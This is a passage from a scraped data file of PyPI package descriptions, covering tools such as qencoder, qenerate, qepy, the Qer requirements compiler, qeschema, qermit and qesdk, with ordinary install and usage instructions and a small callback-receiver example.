combined)[name]IfLBasedoes not contain section[name],LResultwill contain section fromLAdd.IfLBasecontains section[name],LResultwill contain[name]with all settings fromLBaseandLAdd, values inLAddoverride values inLBase.[name:id]The same rules as with section[name]applies,idis treated as part of section name.Note:It is not possible to remove section by applying another layerIt is not possible to changeidpropertyIt is not possible to remove argument from sectionPutting layers into pip-installable packageIt is possible to distribute layers as pure Python package that can be installed usingpip. Layers distributes in that way are always visible and there is no need to specify full path to file.Creating package with layers:Create Python packagelayers_pkg, add empty__init__.pyfile.Put layer files intolayers_pkg/layersfolder, it is possible to use more complex directory structure.AddMANIFEST.infile withrecursive-include layers_pkg/layers *.iniin it.Addsetup.pyfile:fromsetuptoolsimportsetupsetup(name='layers-pkg',version='1.0.0',packages=['layers_pkg'],zip_safe=True,include_package_data=True,entry_points={'qemu_runner_layer_packages':['layers_pkg=layers_pkg']# Always use `package_name=package_name`})Create Python package using tools of your choice (python setup.pyorpyproject-build)Package might contain other files, as it is normal Python package.NOTE:This is simplified process of creating Python package, refer to Python documentation for more details.qemu_runnertools usesqemu_runner_layer_packagesentry point to discover all registered packages, from each entry point module portion is used in search for layers."} +{"package": "qencode", "pacakge-description": "Inside this library you will find sample code for creatingvideo transcodingtasks, launching encoding jobs, video clipping and receiving callbacks. 
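Callbacks in particular are easy to prototype against: a callback URL only needs to point at an HTTP endpoint you control. The sketch below is a minimal, framework-free receiver (the exact fields Qencode posts are not documented here, so it simply logs whatever body arrives); while experimenting, set your job's callback URL to this host and port:
# callback_receiver.py -- minimal sketch of an endpoint for transcoding-status callbacks
from http.server import BaseHTTPRequestHandler, HTTPServer

class CallbackHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read the raw request body and log it; a real handler would parse and persist it.
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        print("callback received:", body)
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), CallbackHandler).serve_forever()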
Updates are posted on a regular basis and we are open to any improvements or suggestions you may have. Some of the options Qencode offers for transcoding your videos at scale:\nResolution: 8K, 4K, 1440p, 1080p, 720p, 480p, 360p, 240\nFeatures: Thumbnails, Watermarking, VR / 360 Encoding, Subtitles & Captions, Create Clips, Video Stitching, S3 Storage, Preview Images, Custom Resolution, Callback URLs, Custom Presets, Rotate, Aspect Ratio, Notifications, Crop Videos\nTransfer & Storage Options: S3 Qencode, AWS, Google Cloud, Backblaze, Azure, FTP, HTTP(S), VPN"} +{"package": "qencode3", "pacakge-description": "Here you will find examples of Qencode solutions using the latest version of python. Some popular examples include launching video encoding jobs through the API, basic testing functionality, and code developed to exhibit a wide range of features that we offer. Please send over any ideas you have to help us improve our solution and continue to provide you with the easiest transcoding solutions on the market.\nKey features of encoding your videos:\nOutput Formats: HLS, MPEG-DASH, MP4, MXF, WebM\nCodecs: H.264 (AVC1), H.265 (HEVC), VP9, VP8, AV1, MPEG-2\nInput Formats: MP4, AVI, MOV, MKV, HLS, MPEG\u20112 (TS & PS), MXF, ASF, ProRes, XDCAM, DNx, FLV ...and many more"} +{"package": "qencoder", "pacakge-description": "Cross platform video encoding gui\nEncoding video is slow. qencoder makes it fast!\nThe most efficient av1 and vp9/vp8 encoders do not scale very well across lots of cpu cores. By intelligently splitting the video into multiple chunks, qencoder allows you to encode better videos than with svt in much less time. qencoder is inspired by and uses code from Av1an, while delivering a more familiar gui experience for Windows and Linux.\nSimple and easy to use\nYou don\u2019t need to have a deep understanding of how video works to take advantage of qencoder. With extremely easy to use and powerful presets, qencoder is for everyone.\nPowerful for those who need it\nqencoder has many useful features which make it a powerful tool. With scene based splitting, qencoder is the first ever gui to take advantage of systems with hundreds of cores. By splitting at the right moments, qencoder ensures your videos do not have any overhead from unneeded keyframes.\nIt is also the first gui capable of boosting dark scenes, allowing you to use lower q values to avoid nasty artifacts like banding when needed.\nIt allows you to configure the colorspace of both your input and output, to ensure that your hdr video stays hdr.\nFinally, it supports minimal splitting, the ideal mode for 2 pass vbr encodes. This mode makes as few splits as possible, keeping them all as far apart as possible so that the bitrate stays as variable as possible.\nVideo queueing\nqencoder is the first gui av1 encoder to support proper video queueing. Set up the perfect encode for your video and add it to a queue. Repeat for as many videos as you want to encode. When you are done, save the queue to a file for later, or run it now with the encode button. If any videos are in the queue, qencoder will encode them.\nPer Scene Encoding\nPer SCENE encoding, analogous to automatic per title encoding, lets you optimize your encodes to save space. Each scene can be encoded to target a specific vmaf (perceptual visual quality). Don\u2019t pay a cloud company to optimize your encodes, qencoder lets you do it all in house.\nFree codecs\nqencoder supports free codecs that can be encoded into webm. This means your videos can be shared and played on any html5 compliant browser. It also means that you do not need to worry about licensing fees or patent violation using it. 
Your encodes are yours, and should stay that way.Using qencoderWindowsDownload the latest 7zip in the \"releases\" section.LinuxUbuntu:Via pip:First, install ffmpeg, an up to date version of aomenc, and an up to date version of vpxenc. Then install qencoder.sudo apt update\nsudo apt install python-pip vpx-tools aom-tools ffmpeg\npip install qencoderArch:It's recommended that you install it from the aur:https://aur.archlinux.org/packages/qencoder/Others/Manual installation:Git clone this repository:git clone https://github.com/natis1/qencodercd qencoderThen install ffmpeg and an up-to-date version of the aom encoder (for instance aomenc-git, on arch)Then install the python requirements:pip install -r requirements.txtThen run it with./qenc.pyLegal noteapp.ico modified from Wikimedia Commons by Videoplasty.com, CC-BY-SA 4.0pav1n.py contains code created by Master of Zen among others, originally licensed asMITand relicensed as gplv3 for the version within this project."} +{"package": "qenerate", "pacakge-description": "Qenerate is a Code Generator for GraphQL Query and Fragment Data Classes. Documentation is athttps://github.com/app-sre/qenerate."} +{"package": "qenerate-custom", "pacakge-description": "Fork of qenerateYou're probably not looking for this package.\nOriginal:https://github.com/app-sre/qenerateChangesPutDEFINITIONin generated fragment files tooAllow fields withskiporincludeto be omitted from the query responseqenerateqenerateis a pluggable code generator for GraphQL Query and Fragment Data Classes.\nIt works hand in hand with GraphQL clients likegql.\nClients like gql return nested untyped dictionaries as result to a query.qenerategenerated classes easily transform these nested untyped dictionaries into concrete classes.qenerateitself is not a GraphQL client and solely focuses on generating code\nfor transforming untyped dictionaries into concrete types.InstallationReleasesare published on pypi.pipinstallqenerateUsageIntrospectionIn a first step we must obtain the GQL schema in the form of an introspection query:qenerateintrospectionhttp://my-gql-instance:4000/graphql>introspection.jsonTheintrospection.jsonis used in a next step to map concrete types to your queries and fragments.Code Generationqeneratecode-iintrospection.jsondir/to/gql/filesAnintrospection.jsonand a (nested) directory holding all your*.gqlfiles are given.qeneratethen generates data classes for every*.gqlfile it encounters\nwhile traversing the given directory.qenerateexpects that a.gqlfile contains exactly onequery,mutationorfragmentdefinition.Note, that the given directory and everygql.file in it share the same scope.\nI.e., within this scope fragment and query names must be unique. Further, you can\nfreely use any fragment within queries, as long as the fragment is defined somewhere\nwithin the scope (directory).Example for Single QuerySingle queryand itsgenerated classes.Example for Query using a FragmentWe define a re-usablefragmentwhich results in the following\ngeneratedre-usable data classes.The fragment is used in aqueryand imported\nin thegenerated python file.More Examplesqenerateis actively used in our qontract-reconcile project. There you can find a lot ofexampleson how generated classes look like in more detail.Pluginsqeneratefollows a plugin based approach. 
I.e., multiple code generators are supported.\nChoosing a code generator is done inside the query file, e.g., the following example will\ngenerate data classes using thepydantic_v1plugin:# qenerate: plugin=pydantic_v1query{...}By choosing a plugin based approach,qeneratecan extent its feature set creating new plugins\nwhile at the same time keeping existing plugins stable and fully backwards compatible.Currently available plugins are:pydantic_v1for generatingPydanticdata classesFeature Flagsqenerateleverages feature flags to configure the behavior of the generator. Feature flags are passed to\nthe generator via comments in your .gql definition file.Plugin# qenerate: plugin=This feature flag tellsqeneratewhich plugin it should use to generate the code for the given definition.Custom Type MappingYou can tell qenerate to map a primitive GQL type (a.k.a. Scalar) to something that you want. This can be handy if your codebase expects other primitive datatypes like, e.g.,strinstead ofJsonordatetime. This can be especially useful for custom GQL primitives.# qenerate: map_gql_scalar=JSON -> strThe above will tell qenerate to map the GQLJSONtype tostrinstead of pydantic'sJson. You can also map multiple types, e.g.,# qenerate: map_gql_scalar=JSON -> str# qenerate: map_gql_scalar=DateTime -> strNaming Collision Strategy# qenerate: naming_collision_strategy=[PARENT_CONTEXT | ENUMERATE]This feature flag tellsqeneratehow to deal with naming collisions in classes.\nIn GraphQL it is easy to query the same object in a nested fashion, which results\nin re-definitions of the type. We call this naming collision. A naming collision\nstrategy defines how to adjust recurring names to make them unique.PARENT_CONTEXTThis is the default strategy if nothing else is specified. It uses the name of the\nparent node in the query as a prefix.ENUMERATEThis strategy adds the number of occurrences of this name as a suffix.However, in most cases it might be cleaner to define a re-usable fragment instead of\nrelying on a collision strategy. Here are somefragment examples.LimitationsOverlapping propertiesAs of nowqeneratedoes not support operations with overlapping properties. E.g.,fragmentMyFragmentonNamespace{b{ef}}queryMyQuery{namespaces{a...MyFragmentb{c# This overlapps with properties in MyFragment}}}The above is valid GQL syntax and will merge properties defined inMyFragmentandb { c }intob {c,e,f}.\nHowever, currentlyqeneratewill fail to deduce proper base classes for these overlapps.\nWork on this is being conducted in#77.DevelopmentCICI happens on anapp-sreowned Jenkins instance.ReleasesPR ChecksBuild and Dependency Managementqenerateusespoetryas build and dependency management system.Formattingqenerateusesrufffor code checking and formatting.Generating setup.pypipinstallpoetry2setup\npoetry2setup.ArchitectureThe architecture is described in more detail inthis document."} +{"package": "qeng-admin-api", "pacakge-description": "Administrative API for the QEng quest engine"} +{"package": "qEngineApi", "pacakge-description": "No description available on PyPI."} +{"package": "qe-obelix", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-flowback", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-flowback-psharma", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-flowback-psharma-beta", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qep-info-objects", "pacakge-description": "# Example PackageThis is a simple example package. You can use\n[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)\nto write your content."} +{"package": "qep-info-objects-test", "pacakge-description": "# Example PackageThis is a simple example package. You can use\n[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)\nto write your content."} +{"package": "qepler", "pacakge-description": "QeplerCreated by Abzu."} +{"package": "qepseudos", "pacakge-description": "qepseudosPseudopotentials for quantum-espresso calculations.Usageimport qepseudosfor \"PBE\"pseudo_dir = qepseudos.pbedirandpseudopotentials = qepseudos.names.Names of all files are given as [Element_Symbol].UPF"} +{"package": "qepy", "pacakge-description": "QEpy - Quantum ESPRESSO in PythonQEpyturns Quantum ESPRESSO (QE) into a Python DFT engine for nonstandard workflows.Contributors and fundingThe Quantum-Multiscale collaborationMain author:Xuecheng Shao(Rutgers)Oliviero Andreussi (UNT), Davide Ceresoli (CNR, Italy), Matthew Truscott (UNT), Andrew Baczewski (Sandia), Quinn Campbell (Sandia), Michele Pavanello (Rutgers)Thanks to ...The Quantum ESPRESSO developers for the QE codebaseNSF for funding the Quantum-Multiscale collaborationRequirementsPython(>=3.7)NumPy(>=1.18.0)f90wrap(>=0.2.8)Quantum ESPRESSO(=6.5)Compiler (GNU(Recommended) orIntel)InstallationPipUsing pip can easy install the release version (serial) of QEpy fromPyPI.python-mpipinstallqepySourceQEAll source codes should be compiled with the-fPICcompuiler option. Add-fPICto the configuration options. E.g.,./configureCFLAGS=-fPICFFLAGS=-fPICtry_foxflags=-fPICMPIF90=mpif90makeallexportqedir=`pwd`QEpygitclone--recurse-submoduleshttps://gitlab.com/shaoxc/qepy.gitoldxml=yesldau=yestddft=yespython-mpipinstall-U./qepyManual and TutorialsSeeQEpy's websitefor details."} +{"package": "qe-qr4-install", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qer", "pacakge-description": "Qer Python Requirements CompilerQer is a Python work-in-progress requirements compiler geared toward large Python projects. It allows you to:Produce an output file consisting of fully constrained exact versions of your requirementsIdentify sources of constraints on your requirementsConstrain your output requirements using requirements that will not be included in the outputSave distributions that are downloaded while compilingUse a current solution as a source of requirements. In other words, you can easily compile a subset from an existing solution.Why use it?pip-toolsis the defacto requirements compiler for Python, but is missing some important features.Does not allow you to use constraints that are not included in the final outputProvides no tools to track down where conflicting constraints originateCannot treat source directories recursively as package sourcesQer has these features, making it an effective tool for large Python projects.This situation is very common:You have a project with requirementsrequirements.txtand test requirementstest-requirements.txt. You want\nto produce a fully constrained output ofrequirements.txtto use to deploy your application. Easy, right? Just\ncompilerequirements.txt. 
However, if your test requirements will in any way constrain packages you need,\neven those needed transitively, it means you will have tested with different versions than you\u2019ll ship. For this reason, you can use Qer to compile requirements.txt using test-requirements.txt as constraints.\nThe Basics\nInstall and run\nQer can be simply installed by running:\npip install qer\nTwo entrypoint scripts are provided:\nreq-compile ... [--constraints constraint_file] [--index-url https://...]\nreq-hash ...\nProducing output requirements\nTo produce a fully constrained set of requirements for a given number of input requirements files, pass requirements\nfiles to req-compile:\n> cat requirements.txt\nastroid>=2.0.0\nisort >= 4.2.5\nmccabe\n\n> req-compile requirements.txt\nastroid==2.1.0 #\nfutures==3.2.0 # isort\nisort==4.3.4 #\nlazy-object-proxy==1.3.1 #\nmccabe==0.6.1 #\nsix==1.12.0 # astroid\ntyping==3.6.6 # astroid\nwrapt==1.11.1 # astroid\nOutput is always emitted to stdout. Possible inputs include:\n> req-compile\n> req-compile .\n# Compiles the current directory (looks for a setup.py)\n\n> req-compile .[test]\n# Compiles the current directory with the extra \"test\"\n\n> req-compile subdir/project\n# Compiles the project in the subdir/project directory\n\n> req-compile subdir/project2[test,docs]\n# Compiles the project in the subdir/project2 directory with the test and docs extra requirements included\n\n> req-candidates --paths-only | req-compile\n# Search for candidates and compile them piped in via stdin\n\n> echo flask | req-compile\n# Compile the requirement 'flask' using the default remote index (PyPI)\nSpecifying source of distributions\nQer supports obtaining python distributions from multiple sources, each of which can be specified more than once. The following sources\ncan be specified, resolved in the same order (e.g. source takes precedence over index-url):\n--solution Load a previous solution and use it as a source of distributions. This will allow a full\nrecompilation of a working solution without requiring any other source. If the\nsolution file can\u2019t be found, a warning will be emitted but not cause a failure.\n--source Use a local filesystem with source python packages to compile from. This will search the entire\ntree specified at the source directory, until an __init__.py is reached. --remove-source can\nbe supplied to remove results that were obtained from source directories. You may want to do\nthis if compiling for a project and only third party requirements compilation results need to be saved.\n--find-links Read a directory to load distributions from. The directory can contain anything\na remote index would, wheels, zips, and source tarballs. This matches pip\u2019s command line.\n--index-url URL of a remote index to search for packages in. When compiling, it\u2019s necessary to download\na package to determine its requirements. --wheel-dir can be supplied to specify where to save\nthese distributions. Otherwise they will be deleted after compilation is complete.\nAll options can be repeated multiple times, with the resolution order within types matching what\nwas passed on the commandline. However, overall resolution order will always match the order\nof the list above. By default, PyPI (https://pypi.org/) is added as a default source. It can be removed by passing --no-index on the commandline.\nIdentifying source of constraints\nWhy did I just get version 1.11.0 of six? 
Find out by examining the output:six==1.11.0 # astroid, pathlib2, pymodbus (==1.11.0), pytest (>=1.10.0), more_itertools (<2.0.0,>=1.0.0)Hashing input requirementsHash input requirements by allowing Qer to parse, combine, and hash a single list. This will allow\nmultiple input files to be logically combined so irrelevant changes don\u2019t cause recompilations. For example,\naddingtenacityto a nested requirements file whentenacityis already included elsewhere.:> req-hash projectreqs.txt\ndc2f25c1b28226b25961a5320e25c339e630342d0ce700b126a5857eeeb9ba12Constraining outputConstrain production outputs with test requirements using the--constraintsflag. More than one file can be\npassed:> cat requirements.txt\nastroid\n\n> cat test-requirements.txt\npylint<1.6\n\n> req-compile requirements.txt --constraints test-requirements.txt\nastroid==1.4.9 # (via constraints: pylint (<1.5.0,>=1.4.5))\nlazy-object-proxy==1.3.1 # astroid\nsix==1.12.0 # astroid\nwrapt==1.11.1 # astroidNote that astroid is constrained bypylint, even thoughpylintis not included in the output.Advanced FeaturesCompiling a constrained subsetInput can be supplied via stdin as well as via as through files. For example, to supply a full\nsolution through a second compilation in order to obtain a subset of requirements, the\nfollowing cmdline might be used:> req-compile requirements.txt --constraints compiled-requirements.txtor, for example to consider two projects together:> req-compile /some/other/project /myproject | req-compile /myproject --solution -which is equivalent to:> req-compile /myproject --constraints /some/other/projectResolving constraint conflictsConflicts will automatically print the source of each conflicting requirement:> cat projectreqs.txt\nastroid<1.6\npylint>=1.5\n\n> req-compile projectreqs.txt\nNo version of astroid could satisfy the following requirements:\n projectreqs.txt requires astroid<1.6\n pylint 1.9.4 (via projectreqs.txt (>=1.5)) requires astroid<2.0,>=1.6Saving distributionsFiles downloading during the compile process can be saved for later install. This can optimize\nthe execution times of builds when a separate compile step is required:> req-compile projectreqs.txt --wheel-dir .wheeldir > compiledreqs.txt\n> pip install -r compilereqs.txt --find-links .wheeldir --no-indexCookbookSome useful patterns for projects are outlined below.Compile, then installAfter requirements are compiled, the usual next step is to install them\ninto a virtualenv.A script for test might run:> req-compile --extra test --solution compiled-requirements.txt --wheel-dir .wheeldir > compiled-requirements.txt\n> pip-sync compiled-requirement.txt --find-links .wheeldir --no-index\nor\n> pip install -r compiled-requirements.txt --find-links .wheeldir --no-indexThis would produce an environment containing all of the requirements and test requirements for the project\nin the current directory (as defined by a setup.py). This is astableset, in that only changes to\nthe requirements and constraints would produce a new output. To produce a totally fresh compilation,\ndon\u2019t pass in a previous solution.The find-links parameter to the sync or pip install willreusethe wheels already downloaded by Qer during\nthe compilation phase. 
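If you prefer to drive these two steps from a script (for example in CI) rather than typing them, a small wrapper around the same commands is enough. The sketch below is only an illustration: it assumes req-compile and pip are on PATH and reuses the file and directory names from the commands above:
# compile_and_install.py -- minimal sketch of the compile-then-install flow shown above
import subprocess

OUTPUT = "compiled-requirements.txt"
WHEEL_DIR = ".wheeldir"

# Compile project + test requirements, seeding from the previous solution (if any)
# and keeping every downloaded distribution in WHEEL_DIR.
compiled = subprocess.run(
    ["req-compile", "--extra", "test", "--solution", OUTPUT, "--wheel-dir", WHEEL_DIR],
    check=True, capture_output=True, text=True,
).stdout

# Only write the new pin set once req-compile has finished reading the old one.
with open(OUTPUT, "w") as out:
    out.write(compiled)

# Install the pinned set using only the wheels gathered during compilation.
subprocess.run(
    ["pip", "install", "-r", OUTPUT, "--find-links", WHEEL_DIR, "--no-index"],
    check=True,
)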
This will make the installation step entirely offline.When taking this environment to deploy, trim down the set to the install requirements:> req-compile --solution compiled-requirements.txt --no-index > install-requirements.txtinstall-requirements.txt will contain the pinned requirements that should be installed in your\ntarget environment. The reason for this extra step is that you don\u2019t want to distribute\nyour test requirements, and you also want your installed requirements to be the same\nversions that you\u2019ve tested with. In order to get all of your explicitly declared\nrequirements and all of the transitive dependencies, you can use the prior solution to\nextract a subset. Passing the--no-indexmakes it clear that this command will not\nhit the remote index at all (though this would naturally be the case as solution files\ntake precedence over remote indexes in repository search order).Compile for a group of projectsQer can discover requirements that are grouped together on the filesystem. Thereq-candidatescommand will print discovered projects and with the--paths-onlyoptions\nwill dump their paths to stdout. This allows recursive discovery of projects that you\nmay want to compile together.For example, consider a filesystem with this layout:solution\n \\_ utilities\n | \\_ network_helper\n |_ integrations\n | \\_ github\n \\_ frameworks\n |_ neural_net\n \\_ clusterIn each of the leaf nodes, there is a setup.py and full python project. To compile these\ntogether and ensure that their requirements will all install into the same environment:> cd solution\n> req-candidates --paths-only\n/home/user/projects/solution/utilities/network_helper\n/home/user/projects/solution/integrations/github\n/home/user/projects/solution/frameworks/neural_net\n/home/user/projects/solution/frameworks/cluster\n\n> req-candidates --paths-only | req-compile --extra test --solution compiled-requirements.txt --wheel-dir .wheeldir > compiled-requirements.txt\n.. 
all reqs and all test reqs compiled together..."} +{"package": "qe-rho", "pacakge-description": "qeRhoThe module is to generate a charge density filecharge-density.datfor quantum espresso to read.to installpip install qe_rhoto use# import superposition of atomic density\nfrom qe_rho import SAD\n\n# initialize SAD density\nrho = SAD('tests/pwscf.in')\n\n# save charge-density.dat to folder pwscf.save\nrho.saverhog('pwscf.save')\n\n# output real-space charge density in a 3D numpy array\nrhor = rho.rho_g2r()update log2022-07-16addedmeshplot.pwscfplot, plot SAD and converged charge density and difference between them.TODOHDF5 supportspin support"} +{"package": "qermit", "pacakge-description": "Qermitqermitis a python module for running error-mitigation protocols on quantum processors usingpytket, the Cambridge Quantum python module for interfacing withCQCTKET, a set of quantum programming tools.This repo containts API documentation, a user manual for getting started withqermitand source code.Getting Startedqermitis compatible with thepytket1.0 release and so is available for Python 3.9, 3.10 and 3.11 on Linux, MacOS and Windows.\nTo install, run:pip install qermitAPI documentation can be found atcqcl.github.io/Qermit.To get a more in depth explanation of Qermit and its features including how to construct custom methods see themanualwhich includes examples.BugsPlease file bugs on the Githubissue tracker.How to citeIf you wish to cite Qermit in any academic publications, we generally recommend citing ourbenchmarking paperfor most cases.ContributingPull requests or feature suggestions are very welcome. To make a PR, first fork the repo, make your proposed\nchanges on themainbranch, and open a PR from your fork. If it passes\ntests and is accepted after review, it will be merged in.Code styleFormattingAll code should adhere toflake8formatting, ignoring only E501 and W503Type annotationOn the CI,mypyis used as a static\ntype checker and all submissions must pass its checks. You should therefore runmypylocally on any changed files before submitting a PR.TestsTo run the tests:cdinto thetestsdirectory;ensure you have installedpytest;runpytest.When adding a new feature, please add a test for it. 
When fixing a bug, please\nadd a test that demonstrates the fix."} +{"package": "qeschema", "pacakge-description": "Theqeschemapackage provides tools for\nconverting XML data produced by the Quantum ESPRESSO suite of codes (ESPRESSO:\nopEn-Source Package for Research in Electronic Structure, Simulation and Optimization).RequirementsPython3.7+xmlschema(Python library for processing XML Schema based documents)InstallationYou can install the library withpipin a Python 3.7+ environment:pip install qeschemaIf you need HDF5 utilities and/or the YAML format, install the extra\nfeatures using the appropriate command from these alternatives:pip install qeschema[HDF5]\npip install qeschema[YAML]\npip install qeschema[HDF5,YAML]UsageDefine you data document using:>>>importqeschema>>>pw_document=qeschema.PwDocument()and then read XML data from a file processed by the corresponding application of\nQuantum ESPRESSO suite:>>>pw_document.read(\"tests/examples/pw/Al001_relax_bfgs.xml\")Loaded data can be decoded to Python data dictionary or written to JSON or YAML formats:>>>xml_data=pw_document.to_dict()>>>json_data=pw_document.to_json()AuthorsDavide BrunatoPietro DelugasGiovanni BorghiAlexandr FonariLicenseThis software is distributed under the terms of the MIT License.\nSee the file \u2018LICENSE\u2019 in the root directory of the present\ndistribution, orhttp://opensource.org/licenses/MIT."} +{"package": "qesdk", "pacakge-description": "Project DescriptionProvide history market quotation of futures and options in Chinese market for inquiry.Output pandas.DataFrame format data which is easy to use.Support three frequency data: 'daily'/'mintue'/'tick'Installationpip install qesdkUpgradepip install -U qesdkQuick StartDaily frequencyfrom qesdk import *\nget_price('ZN2210.SFE','2022-07-11', '2022-07-24','daily')return:open close high low volume money \\\ntime \n2022-07-11 22890.0 22730.0 23095.0 22710.0 6622 7.586028e+08 \n2022-07-12 22875.0 22825.0 23265.0 22570.0 6976 7.926840e+08 \n2022-07-13 22825.0 22015.0 22830.0 21885.0 9616 1.090028e+09 \n2022-07-14 21900.0 21385.0 22035.0 21175.0 17883 1.935010e+09 \n2022-07-15 21400.0 21050.0 21505.0 20980.0 11737 1.242712e+09 \n2022-07-18 21300.0 21780.0 21870.0 21215.0 10991 1.180527e+09 \n2022-07-19 22120.0 22095.0 22230.0 22060.0 9348 1.035372e+09 \n2022-07-20 21750.0 21970.0 22005.0 21600.0 8816 9.613756e+08 \n2022-07-21 22300.0 22000.0 22300.0 21855.0 8543 9.477114e+08 \n2022-07-22 21900.0 21925.0 21965.0 21770.0 13236 1.446647e+09 \n\n position upperlimit lowerlimit presett preclose settle \ntime \n2022-07-11 23345.0 25730.0 20215.0 22975.0 22890.0 22870.0 \n2022-07-12 24395.0 25610.0 20125.0 22870.0 22950.0 22885.0 \n2022-07-13 27160.0 25630.0 20135.0 22885.0 22825.0 22430.0 \n2022-07-14 26170.0 25120.0 19735.0 22430.0 22015.0 21600.0 \n2022-07-15 27301.0 24190.0 19005.0 21600.0 21385.0 21220.0 \n2022-07-18 27857.0 23765.0 18670.0 21220.0 21050.0 21760.0 \n2022-07-19 29230.0 24370.0 19145.0 21760.0 21985.0 21915.0 \n2022-07-20 30704.0 24540.0 19285.0 21915.0 21660.0 21960.0 \n2022-07-21 35460.0 24595.0 19320.0 21960.0 22095.0 22065.0 \n2022-07-22 37524.0 24710.0 19415.0 22065.0 22000.0 21965.0Minute frequencyfrom qesdk import *\nget_price('ZN2210.SFE','2022-07-11', '2022-07-24','minute')return:open close high low volume money\ntime \n2022-07-11 09:01:00 22785.0 22760.0 22785.0 22700.0 163 18534950.0\n2022-07-11 09:02:00 22760.0 22725.0 22760.0 22685.0 195 22134500.0\n2022-07-11 09:03:00 22715.0 22720.0 22725.0 22700.0 39 4427900.0\n2022-07-11 09:04:00 
22720.0 22710.0 22720.0 22680.0 63 7152150.0\n2022-07-11 09:05:00 22710.0 22700.0 22725.0 22690.0 47 5335800.0\n... ... ... ... ... ... ...\n2022-07-23 00:56:00 22375.0 22360.0 22375.0 22360.0 13 1453650.0\n2022-07-23 00:57:00 22375.0 22365.0 22375.0 22355.0 29 3242625.0\n2022-07-23 00:58:00 22360.0 22355.0 22365.0 22355.0 25 2794725.0\n2022-07-23 00:59:00 22355.0 22380.0 22385.0 22355.0 13 1454125.0\n2022-07-23 01:00:00 22380.0 22400.0 22400.0 22375.0 69 7723875.0\n\n[4170 rows x 6 columns]Tick frequecyfrom qesdk import *\nget_ticks('ZN2210.SFE','2022-08-21', '2022-08-24',fields=['current', 'position','volume'])return:current position volume\ntime \n2022-08-22 09:00:00.500 24720.0 92068.0 61019\n2022-08-22 09:00:01.000 24725.0 92054.0 61044\n2022-08-22 09:00:01.500 24735.0 92052.0 61063\n2022-08-22 09:00:02.000 24745.0 92071.0 61111\n2022-08-22 09:00:02.500 24745.0 92067.0 61142\n... ... ... ...\n2022-08-23 23:59:54.000 24920.0 97685.0 42997\n2022-08-23 23:59:54.500 24920.0 97685.0 42997\n2022-08-23 23:59:55.500 24920.0 97685.0 42997\n2022-08-23 23:59:59.500 24920.0 97685.0 42997\n2022-08-24 00:00:00.000 24920.0 97685.0 42997\n\n[8314 rows x 3 columns]More detailsThe detail document could be obtained onhttps://quantease.cn/newdoc/qesdk.html"} +{"package": "qe-settings", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qetools", "pacakge-description": "QEToolsIt is a command line helper to run comman quantum espresso calculations.Usage:qetools -c [CALCULATION] [OTHER ARGS]Info:By default PBE, PBESOL and LDA (all ONCV) pseudo-potentials are downloaded.Arguments:-c [CALCULATION]encut, kgrid, vacuum- respective convergences.vc-relax- variable cell relaxation.pressure- to get structure at required (compressed) pressure.- *-rp* required pressure in kbars.\n\n- *-ic* intial compression factor (default 0.9).eos- fits equation of state using ASE.- *-ns* number of structures to consider for fitting (default 10).harmonic- energy vs. displacement plot for selected atoms in selected directions.- *-aid* index of atom(s) to displace, by default all unique atoms will be displaced.\n\n- *-dd* direction of displacement, default ( -dd 0 1 2 ).scf- single point energy calculation (All the below calculations require completed 'scf' calculation).nscf- to be done after 'scf' calculation, with finer grid.bands- electronic band structure calculation, by default ase.dft.bandpath will be used, saves plot.dos- electronic dos calculation, saves plot.ph_pre- setting up phonon calculation (must).ph_mid- creates a script which can be run on multiple jobs for ph.x calcuations.ph_post- after ph_mid or ph_pre, completes phonon calculation, returns flfrc file.ph_bands- phonon bandstructure.ph_dos- phonon density of states.epw_pre- setting up for EPW calculation (to be done after 'scf', 'ph_post').epw_post- Performs EPW calculation.Others-e [ENCUT][Ry](default 50).-k [KGRID](default 4 4 4).-v [VACUUM][ANG](default 10)\n*-vdrvacuum direction 1,2,3 for x,y,z direction (must for vacuum calcs)-t [THRESHOLD](default 0.01)-ppn [NODES](default available/2)-ppd [PSEUDOPOTENTIAL DIRECTORY]lda, pbe, pbesol can be used to use default potentials. 
Otherwise expects path where PPs are present in the format 'Cu.UPF' (default pbe).-fASE readable structure file.-emin, -emaxy-axis limits for electronic bandstructure plot.-asracoustic sum rule for ph_post, (default simple).-nqnumber of q(k) points in bandstructures.-bpbandpath for bandstructures like 'GXLMK', default from ase.bandpath.-npoolnpool for epw related calcs.-parparameters file in the following format (for pw.x, ph.x, dos.x, epw.x)ecutwfc 80\ncalculation scf\n...Example: qetools -c scf -e 80 -k 4 4 4 -f si.cif -ppd lda -ppn 8 -par parameters.txt"} +{"package": "qe-tools", "pacakge-description": "qe-toolsThis repository contains a set of useful tools for Quantum ESPRESSO, in particulara parser for pw.x input filesa parser for cp.x input filesThe code is developed and maintained by the AiiDA Team and is licensed under the MIT license (see LICENSE file)."} +{"package": "qetrader", "pacakge-description": "qetrader\u4ea4\u6613\u63a5\u53e3\u7b80\u4ecbqetrader\u4ea4\u6613\u63a5\u53e3\u53ef\u4ee5\u901a\u8fc7pip\u76f4\u63a5\u5b89\u88c5\u5728\u7528\u6237\u672c\u5730\uff0c\u5b9e\u73b0\u5728\u4efb\u610fpython\u73af\u5883\u4e0b\u8fdb\u884c\u7b56\u7565\u5f00\u53d1\u3001\u56de\u6d4b\u3001\u6a21\u62df\u4ea4\u6613\u548c\u5b9e\u76d8\u4ea4\u6613\u3002\u5b89\u88c5\u8bf4\u660e\u9996\u5148\uff0c\u60a8\u7684\u7cfb\u7edf\u4e0a\u5fc5\u987b\u5df2\u7ecf\u5b89\u88c5\u4e86python\u73af\u5883\uff08\u7248\u672c3.7\u6216\u4ee5\u4e0a\uff09\uff0c\u63a8\u8350\u4f7f\u7528anaconda3. 